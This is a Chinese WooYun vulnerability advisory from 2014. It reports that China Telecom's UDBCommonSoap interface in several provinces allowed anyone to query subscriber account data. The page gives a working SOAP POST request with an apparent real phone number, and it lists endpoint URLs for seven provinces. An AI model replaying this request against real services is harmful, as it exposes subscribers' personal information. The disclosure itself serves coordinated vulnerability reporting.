当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083095

漏洞标题:中国电信多省用户数据库接口配置不当允许任意查询(可查机主大量信息)

相关厂商:中国电信综合平台开发运营中心

漏洞作者: asdf

提交时间:2014-11-13 17:17

修复时间:2014-12-28 17:18

公开时间:2014-12-28 17:18

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-13: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-28: 细节向公众公开

简要描述:

最近在研究一些xml防护的东西

详细说明:

1.png


POST /BME/services/UDBCommonSoap HTTP/1.1
Host: hb.passport.189.cn:8080
Content-Type: text/xml; charset=utf-8
Content-Length: 517
SOAPAction: "http://hb.passport.189.cn:8080/AccountInfoQuery"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<AccountInfoQuery xmlns="http://hb.passport.189.cn:8080/">
<srcSsDeviceNo>1000000000000001</srcSsDeviceNo>
<querySsDeviceNo>1000000000000001</querySsDeviceNo>
<userID>18963997016</userID>
<queryInfoType>0</queryInfoType>
</AccountInfoQuery>
</soap:Body>
</soap:Envelope>


漏洞证明:

1.png


@M[WIV])B%QL[9$29DBWN2Q.jpg


1(168EB`OHZ{VBMFF)~EUW4.jpg


06782DC5-CF2B-43B9-94DF-9FE247A47E92.png


OMRVD65QY%]M)2[)~I)4QS1.jpg


http://jl.passport.189.cn:8080/BME/services/UDBCommonSoap 吉林
http://ln.passport.189.cn:8080/BME/services/UDBCommonSoap 辽宁
http://hb.passport.189.cn:8080/BME/services/UDBCommonSoap 湖北
http://jx.passport.189.cn:18080/BME/services/UDBCommonSoap 江西
http://js.passport.189.cn:18080/BME/services/UDBCommonSoap 江苏
http://sd.passport.189.cn:8080/BME/services/UDBCommonSoap 山东
http://bj.passport.189.cn:8080/BME/services/UDBCommonSoap 北京
天翼云:

ANXU`)WRF@@9V2]_D~NA875.jpg


q

修复方案:

限制查询接口的IP/IP段

版权声明:转载请注明来源 asdf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-11-14 14:08

厂商回复:

最新状态:

暂无